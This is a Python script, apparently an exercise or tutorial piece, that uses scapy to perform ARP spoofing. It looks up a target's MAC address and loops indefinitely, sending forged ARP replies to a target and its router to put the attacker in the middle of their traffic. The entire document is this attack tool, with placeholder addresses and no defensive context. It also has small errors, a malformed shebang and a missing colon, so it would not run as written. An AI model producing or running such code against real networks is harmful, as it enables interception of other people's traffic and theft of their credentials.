#!usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):

    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
    arp_request_packet = broadcast/arp_request
    answered_list = scapy.srp(arp_request_packet, timeout=1, verbose = False)[0]
    return answered_list[0][1].hwsrc

def spoof(target_ip,spoof_ip)
    
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2,pdst=target_ip,hwdst=target_mac,psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
      
      spoof("<ip address of target","<ip address of router")
      spoof("<ip address of router","<ip address of target")
      sent_packets_count = sent_packets_count +2
      print("[+]packets sent:" + str(sent_packets_count))
      time.sleep(2)
